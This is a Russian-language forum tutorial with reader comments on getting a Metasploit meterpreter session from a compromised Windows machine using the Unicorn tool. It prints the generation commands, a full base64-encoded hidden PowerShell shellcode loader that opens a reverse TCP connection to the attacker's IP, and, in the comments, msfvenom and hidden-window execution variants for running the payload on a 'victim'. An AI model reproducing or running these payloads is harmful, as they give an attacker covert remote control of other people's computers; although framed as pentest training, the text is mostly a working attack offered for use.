Статья Быстрый способ получить meterpreter

Привет колеги. )
Сегодня речь пойдет непосредственно о пост эксплуатации скомпрометированной системы
(когда у нас есть командная строка удаленной windows машины от windows 7) и нам нужно расширить функционал своих возможностей с помощью метерпретер сессии метаслоита.

Для этого нам отлично подойдет тулза от trustedsec ,которая носит названия Magic Unicorn.
Одна из ее возможностей - это создания команды для PowerShell ,что есть доверенным приложением Windows.

Вообщем ближе к делу.
Качаем:
Код:
git clone https://github.com/trustedsec/unicorn.git
1.png

Запускаем.Смотрим help.
2.jpg

Выполняем команду
Код:
python unicorn.py windows/meterpreter/reverse_tcp 192.168.137.137 443
3.png

Получаем два интересных нам файла:
unicorn.rc - скрипт автоматизации вводимых команд для метасплоита(что бы юзер вручную не вводил настройки типа set LHOST , use exploit/multi/handler ... )
powershell_attack.txt -- сама команда для powershell. (Ее нужно скопировать в буфер и запустить на стороне жертвы)
4.jpg

У себя выполняем
Код:
msfconsole -r unicorn.rc
У жертвы команду из powershell_attack.txt
Код:
powershell -window hidden -e JABIAFEAUQAgAD0AIAAnACQAUgBOAG8AIAA9ACAAJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAUgBOAG8AIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAYgBiACwAMAB4AGYANgAsADAAeAAxADIALAAwAHgAMAA1ACwAMAB4ADgANQAsADAAeABkADkALAAwAHgAYwBhACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeAA1AGEALAAwAHgAMgBiACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANAA3ACwAMAB4ADgAMwAsADAAeABlAGEALAAwAHgAZgBjACwAMAB4ADMAMQAsADAAeAA1AGEALAAwAHgAMABmACwAMAB4ADAAMwAsADAAeAA1AGEALAAwAHgAZgA5ACwAMAB4AGYAMAAsADAAeABmADAALAAwAHgANwA5ACwAMAB4AGUAZAAsADAAeAA3ADcALAAwAHgAZgBhACwAMAB4ADgAMQAsADAAeABlAGQALAAwAHgAMQA3ACwAMAB4ADcAMgAsADAAeAA2ADQALAAwAHgAZABjACwAMAB4ADEANwAsADAAeABlADAALAAwAHgAZQBjACwAMAB4ADQAZQAsADAAeABhADgALAAwAHgANgAyACwAMAB4AGEAMAAsADAAeAA2ADIALAAwAHgANAAzACwAMAB4ADIANgAsADAAeAA1ADEALAAwAHgAZgAxACwAMAB4ADIAMQAsADAAeABlAGYALAAwAHgANQA2ACwAMAB4AGIAMgAsADAAeAA4AGMALAAwAHgAYwA5ACwAMAB4ADUAOQAsADAAeAA0ADMALAAwAHgAYgBjACwAMAB4ADIAYQAsADAAeABmAGIALAAwAHgAYwA3ACwAMAB4AGIAZgAsADAAeAA3AGUALAAwAHgAZABiACwAMAB4AGYANgAsADAAeAAwAGYALAAwAHgANwAzACwAMAB4ADEAYQAsADAAeAAzAGYALAAwAHgANgBkACwAMAB4ADcAZQAsADAAeAA0AGUALAAwAHgAZQA4ACwAMAB4AGYAOQAsADAAeAAyAGQALAAwAHgANwBmACwAMAB4ADkAZAAsADAAeABiADQALAAwAHgAZQBkACwAMAB4AGYANAAsADAAeABlAGQALAAwAHgANQA5ACwAMAB4ADcANgAsADAAeABlADgALAAwAHgAYQA1ACwAMAB4ADUAOAAsADAAeAA1ADcALAAwAHgAYgBmACwAMAB4AGIAZQAsADAAeAAwADIALAAwAHgANwA3ACwAMAB4ADQAMQAsADAAeAAxADMALAAwAHgAMwBmACwAMAB4ADMAZQAsADAAeAA1ADkALAAwAHgANwAwACwAMAB4ADcAYQAsADAAeAA4ADgALAAwAHgAZAAyACwAMAB4ADQAMgAsADAAeABmADAALAAwAHgAMABiACwAMAB4ADMAMwAsADAAeAA5AGIALAAwAHgAZgA5ACwAMAB4AGEAMAAsADAAeAA3AGEALAAwAHgAMQA0ACwAMAB4ADAAOAAsADAAeABiADgALAAwAHgAYgBiACwAMAB4ADkAMgAsADAAeABmADMALAAwAHgAYwBmACwAMAB4AGIANQAsADAAeABlADEALAAwAHgAOABlACwAMAB4AGQANwAsADAAeAAwADEALAAwAHgAOQA4ACwAMAB4ADUANAAsADAAeAA1AGQALAAwAHgAOQAyACwAMAB4ADMAYQAsADAAeAAxAGUALAAwAHgAYwA1ACwAMAB4ADcAZQAsADAAeABiAGIALAAwAHgAZgAzACwAMAB4ADkAMAAsADAAeABmADUALAAwAHgAYgA3ACwAMAB4AGIAOAAsADAAeABkADcALAAwAHgANQAyACwAMAB4AGQAYgAsADAAeAAzAGYALAAwAHgAMwBiACwAMAB4AGUAOQAsADAAeABlADcALAAwAHgAYgA0ACwAMAB4AGIAYQAsADAAeAAzAGUALAAwAHgANgBlACwAMAB4ADgAZQAsADAAeAA5ADgALAAwAHgAOQBhACwAMAB4ADIAYgAsADAAeAA1ADQALAAwAHgAOAAwACwAMAB4AGIAYgAsADAAeAA5ADEALAAwAHgAMwBiACwAMAB4AGIAZAAsADAAeABkAGMALAAwAHgANwBhACwAMAB4AGUAMwAsADAAeAAxAGIALAAwAHgAOQA2ACwAMAB4ADkANgAsADAAeABmADAALAAwAHgAMQAxACwAMAB4AGYANQAsADAAeABmAGUALAAwAHgAMwA1ACwAMAB4ADEAOAAsADAAeAAwADYALAAwAHgAZgBlACwAMAB4ADUAMQAsADAAeAAyAGIALAAwAHgANwA1ACwAMAB4AGMAYwAsADAAeABmAGUALAAwAHgAOAA3ACwAMAB4ADEAMQAsADAAeAA3AGMALAAwAHgANwA2ACwAMAB4ADAAZQAsADAAeABlADUALAAwAHgAOAAzACwAMAB4AGEAZAAsADAAeABmADYALAAwAHgANwA5ACwAMAB4ADcAYQAsADAAeAA0AGUALAAwAHgAMAA3ACwAMAB4ADUAMwAsADAAeABiADgALAAwAHgAMQBhACwAMAB4ADUANwAsADAAeABjAGIALAAwAHgANgA5ACwAMAB4ADIAMwAsADAAeAAzAGMALAAwAHgAMABiACwAMAB4ADkANgAsADAAeABmADYALAAwAHgAYQA5ACwAMAB4ADAAZQAsADAAeAAwADAALAAwAHgAMwA5ACwAMAB4ADgANQAsADAAeAA5ADgALAAwAHgANQA5ACwAMAB4AGQAMQAsADAAeABkADQALAAwAHgAOQBhACwAMAB4ADUAOAAsADAAeAA5ADkALAAwAHgANQAwACwAMAB4ADcAYwAsADAAeAAwAGEALAAwAHgAOABkACwAMAB4ADMAMgAsADAAeABkADEALAAwAHgAZQBhACwAMAB4ADcAZAAsADAAeABmADMALAAwAHgAOAAxACwAMAB4ADgAMgAsADAAeAA5ADcALAAwAHgAZgBjACwAMAB4AGYAZQAsADAAeABiADIALAAwAHgAOQA3ACwAMAB4AGQANgAsADAAeAA5ADYALAAwAHgANQA4ACwAMAB4ADcAOAAsADAAeAA4AGYALAAwAHgAYwBmACwAMAB4AGYANAAsADAAeABlADEALAAwAHgAOABhACwAMAB4ADgANAAsADAAeAA2ADUALAAwAHgAZQBkACwAMAB4ADAAMAAsADAAeABlADEALAAwAHgAYQA1ACwAMAB4ADYANQAsADAAeABhADcALAAwAHgAMQA1ACwAMAB4ADYAYgAsADAAeAA4AGUALAAwAHgAYwAyACwAMAB4ADAANQAsADAAeAAxAGIALAAwAHgANwBlACwAMAB4ADkAOQAsADAAeAA3ADQALAAwAHgAOABkACwAMAB4ADgAMQAsADAAeAAzADcALAAwAHgAMQAyACwAMAB4ADMAMQAsADAAeAAxADQALAAwAHgAYgBjACwAMAB4AGIANQAsADAAeAA2ADYALAAwAHgAOAAwACwAMAB4AGIAZQAsADAAeABlADAALAAwAHgANAAwACwAMAB4ADAAZgAsADAAeAA0ADAALAAwAHgAYwA3ACwAMAB4AGQAYgAsADAAeAA4ADYALAAwAHgAZAA0ACwAMAB4AGEAOAAsADAAeABiADMALAAwAHgAZQA2ACwAMAB4ADMAOAAsADAAeAAyADkALAAwAHgANAAzACwAMAB4AGIAMQAsADAAeAA1ADIALAAwAHgAMgA5ACwAMAB4ADIAYgAsADAAeAA2ADUALAAwAHgAMAA3ACwAMAB4ADcAYQAsADAAeAA0AGUALAAwAHgANgBhACwAMAB4ADkAMgAsADAAeABlAGUALAAwAHgAYwAzACwAMAB4AGYAZgAsADAAeAAxAGQALAAwAHgANAA3ACwAMAB4AGIAMAAsADAAeABhADgALAAwAHgANwA1ACwAMAB4ADYANQAsADAAeABlAGYALAAwAHgAOQBmACwAMAB4AGQAOQAsADAAeAA5ADYALAAwAHgAZABhACwAMAB4ADIAMQAsADAAeAAyADUALAAwAHgANAAxACwAMAB4ADIAMgAsADAAeAA1ADQALAAwAHgANAA3ACwAMAB4ADUAMQA7ACQAZwAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJAB6AC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAAwACkAewAkAGcAIAA9ACAAJAB6AC4ATABlAG4AZwB0AGgAfQA7ACQATwBjAE4APQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAE8AYwBOAC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABPAGMATgAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAOwApAHsAUwB0AGEAcgB0AC0AcwBsAGUAZQBwACAANgAwAH0AOwAnADsAJABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkAEgAUQBRACkAKQA7ACQAMQB0AHoAIAA9ACAAIgAtAGUAIAAiADsAaQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA4ACkAewAkADAANgBlACAAPQAgACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0ACAAKwAgACIAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAiADsAaQBlAHgAIAAiACYAIAAkADAANgBlACAAJAAxAHQAegAgACQAZQAiAH0AZQBsAHMAZQB7ADsAaQBlAHgAIAAiACYAIABwAG8AdwBlAHIAcwBoAGUAbABsACAAJAAxAHQAegAgACQAZQAiADsAfQA=
6.png

5.jpg

Ловим сессию.
Всем спасибо)


 

Apton

Green Team
17.04.2017
40
140
BIT
0
Спасибо за информативную статью, учусь пентестингу, и наткнулся на ваши статьи. Сильно продвинулся. Еще раз спасибо.
 
I

IioS

Поднимаю хандлер, но сессию взять немогу... Не копипастом, не .бат, немогу понять почему. (АВ выключала, и выключала для тестов) Есть у кого-то предположения почему так?
 

kot-gor

Well-known member
07.09.2016
529
705
BIT
0
все должно работать..я сам пользовался данной тулзой в свое время..попробуйте поменять на https, очень часто меня это выручает.
 
  • Нравится
Реакции: Сергей Попов
N

n01n02h

Ее нужно скопировать в буфер и запустить на стороне жертвы
Зачемона нужна еслу уже есть доступ к пк?
 

Merkif

Green Team
10.01.2017
13
12
BIT
0
Ее нужно скопировать в буфер и запустить на стороне жертвы
Зачемона нужна еслу уже есть доступ к пк?
А кто сказал, что есть доступ к пк?
команду для powershell подсовываете жертве в виде батника или по другому.
В реальных условиях придется самому допиливать.
Это всего лишь один из вариантов.
 
N

n01n02h

А кто сказал, что есть доступ к пк?
команду для powershell подсовываете жертве в виде батника или по другому.
В реальных условиях придется самому допиливать.
Это всего лишь один из вариантов.
Просто написано скопировать и запустить)))
 
F

FuSp

Еще из схожих и удобных инструментов - setoolkit. Статья хорошая, ну а я пошел учиться поднимать hta сервер.
 

Mitistofel

Green Team
03.06.2018
264
151
BIT
0
Поднимаю хандлер, но сессию взять немогу... Не копипастом, не .бат, немогу понять почему. (АВ выключала, и выключала для тестов) Есть у кого-то предположения почему так?
Такая же фигня, не "tcp" не "https" сессии не даёт...
Help me кто нибудь )
 

kot-gor

Well-known member
07.09.2016
529
705
BIT
0
добрый вечер, вы можете скрин выслать .того что вы делали.. мне легче будет вам дать дельный совет,отталкиваясь от фактов..
 

Mitistofel

Green Team
03.06.2018
264
151
BIT
0
добрый вечер, вы можете скрин выслать .того что вы делали.. мне легче будет вам дать дельный совет,отталкиваясь от фактов..
Благодарю, за внимание к моему вопросу )

Ситуация такова:
Ловлю сессию через "Empire", порт 4444
Потом использую такую команду, для получения кода в "unicorn" - "python unicorn.py windows/meterpreter/reverse_tcp 192.168.0.35 443"
Запускаю "Метасплоит" - "msfconsole -r unicorn.rc"
Запускаю код от "unicorn", на целевой машине в "cmd", в "powershell", как "батник"...
В "Метасплоите" тишина...
Unicorn.png
Unicorn1.png
Unicorn2.png
Unicorn3.png
Unicorn4.png


Может быть дело с портами. Потому что с 433 портом не чего не делал. Но вчера остановился на том, что пробовал его открыть, так вообще пинговаться всё перестало )

Так же делаю так:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.35 LPORT=443 -f exe > /root/test.exe
Запускаю этот файл на целевой машине, активирую слушателя в "метасплоит"
Ооо, этот приём сегодня работает, вчера вечером разок пробовал, не получалось....

Но первая проблема всё ещё актуальна...
 

Вложения

  • Unicorn.png
    Unicorn.png
    165 КБ · Просмотры: 175
  • Unicorn1.png
    Unicorn1.png
    199,9 КБ · Просмотры: 178
Последнее редактирование:
  • Нравится
Реакции: Johnnnnnnnn

Mitistofel

Green Team
03.06.2018
264
151
BIT
0
cmd.exe /c start /min unicorn.bat ^& exit
Благодарю за участие.
Эту команду как надо было выполнить? Просто закинуть код из "unicorn" в .bat. А потом в "cmd" выполнить "cmd.exe /c start /min unicorn.bat ^& exit"?
Если да, то не работает...

1.png
powershell.exe -nop -wind hidden -Exec Bypass -noni -enc UnicronBase64output
А с этим что делать?
В "powershell" писать "powershell.exe -nop -wind hidden -Exec Bypass -noni -enc UnicronBase64output" и потом через пробел команду от "unicorn"?
Если да, то тоже не работает...
2.png
 

Tihon49

Green Team
06.01.2018
193
120
BIT
0
Благодарю за участие.
Эту команду как надо было выполнить? Просто закинуть код из "unicorn" в .bat. А потом в "cmd" выполнить "cmd.exe /c start /min unicorn.bat ^& exit"?
Если да, то не работает...


А с этим что делать?
В "powershell" писать "powershell.exe -nop -wind hidden -Exec Bypass -noni -enc UnicronBase64output" и потом через пробел команду от "unicorn"?
Если да, то тоже не работает...
После ....-enc код_из_единорога
Само слово UnicronBase64output замени кодом.
 
  • Нравится
Реакции: Mitistofel
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!